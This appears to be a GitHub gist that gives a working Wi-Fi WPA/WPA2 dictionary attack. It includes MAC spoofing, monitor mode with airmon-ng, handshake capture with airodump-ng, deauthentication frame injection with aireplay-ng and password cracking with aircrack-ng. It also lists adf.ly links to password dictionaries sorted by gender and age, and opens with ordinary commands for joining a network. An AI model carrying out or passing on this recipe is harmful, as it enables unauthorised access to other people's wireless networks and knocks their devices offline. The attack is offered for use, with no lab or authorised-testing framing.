Skip to content

Instantly share code, notes, and snippets.

@diegodorado
Last active February 22, 2024 02:42
Show Gist options
  • Save diegodorado/84cfc23ec89bb8fc4ad36bd16add7be3 to your computer and use it in GitHub Desktop.
Save diegodorado/84cfc23ec89bb8fc4ad36bd16add7be3 to your computer and use it in GitHub Desktop.
Execute dictionary attack to Wi-Fi Network
# list wifi interfaces
iw dev
# set wlan up
ip link set wlan0 up
# scan ssids
iw wlan0 scan | grep -i ssid
# create a config file (type the ssid password)
wpa_passphrase SSID_NAME >> /etc/wpa_supplicant.conf
# connect to wpa2 wifi network
wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
# check if connected
iw wlan0 link
# get an ip
dhclient wlan0
*Diccionario mujer extranjera: http://adf.ly/1msF0o
*Diccionario mujer 1 a 10 (90 a 60 años aprox): http://adf.ly/1msF9x
*Diccionario mujer 10 a 20 (60 a 45 años aprox): http://adf.ly/1msFAn
*Diccionario mujer 20 a 30 (45 a 35 años aprox): http://adf.ly/1msFBh
*Diccionario mujer 30 a 40 (35 a 22 años aprox): http://adf.ly/1msFCT
https://drive.google.com/file/d/0B_9YgZYyPWjzbl9JZjdzNTFweXc/view
*Diccionario mujer 40 a 45 (22 a 18 años aprox): http://adf.ly/1msFCx
*Diccionario hombre extranjero: http://adf.ly/1msF2l
*Diccionario hombre 1 a 10 (90 a 60 años aprox): http://adf.ly/1msF4h
*Diccionario hombre 10 a 20 (60 a 45 años aprox): http://adf.ly/1msF64
*Diccionario hombre 20 a 30 (45 a 35 años aprox): http://adf.ly/1msF6u
*Diccionario hombre 30 a 40 (35 a 22 años aprox): http://adf.ly/1msF7r
*Diccionario hombre 40 a 45 (22 a 18 años aprox): http://adf.ly/1msF8d
# from http://ourcodeworld.com/articles/read/407/how-to-hack-a-wi-fi-network-wpa-wpa2-through-a-dictionary-attack-with-kali-linux
# List interfaces (let's say it is wlan0)
ip -a link
# Disable interface to change the MAC address
ip link set dev wlan0 down
# Spoof MAC address to 00:11:22:33:44:55
ip link set dev wlan0 address 00:11:22:33:44:55
# Enable interface again :)
ip link set dev wlan0 up
# Kill any services
airmon-ng check kill
# Start interface in monitor mode
airmon-ng start wlan0
# Now from the previous step copy the name of the interface in monitor mode
# Example of output previous step: monitor mode vif enabled for [phy]wlan0 on [phy0]wlan0mon
# Name = wlan0mon
# Dump available Wi-Fi networks
airodump-ng wlan0mon
# The previous step should output a table like the following:
#|BSSID |PWR |Beacons | #Data | #/s |CH |MB |ENC |CIPHER |AUTH | ESSID |
#|E0:98:61:47:BD:E2 |-34 |38 | 0 | 0 |1 |54e. |WPA2 |CCMP |PSK | The network name |
# You should copy this information as you will need the information of the network to execute some
# commands that require those values as arguments
# Copy WPA handshake with the following command
airodump-ng -c [channel] --bssid [BSSID] -w [path/to/folder/output] [interface-name-in-monitor-mode]
# Example: airodump-ng -c 1 --bssid E0:98:61:47:BD:E2 -w /root/hacking/ wlan0mon
# Note: this process can take a lot of time, so be patient
# Once the following message appears:
# WPA Handshake [BSSID OF THE DEVICE, EXAMPLE E0:98:61:47:BD:E2]
# You can proceed with the next step and stop the current command as it will still running
# The .cap files should be now in the [path/to/folder/output]
# Inject frames to Ten authentication packages
# Recommend numberofpackages = 10
aireplay-ng -0 [number-of-packages] -a [BSSID] [interface-name-in-monitor-mode]
# Example: aireplay-ng -0 10 -a E0:98:61:47:BD:E2 wlan0mon
# Start dictionary attack using the WPA Handshake previously downloaded and
aircrack-ng -a2 -b [BSSID] -w [path to dictionary] [path to .cap files of handshake]
# Example: aircrack-ng -a2 -b E0:98:61:47:BD:E2 -w /root/hacking/passwords.txt /root/hacking/*.cap
# That's all !
# restart or remove the wlan0mon
iw dev wlan0mon del
#restore wlan0
iw phy phy0 interface add wlan0 type managed
# Enable interface again :)
ip link set dev wlan0 up
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment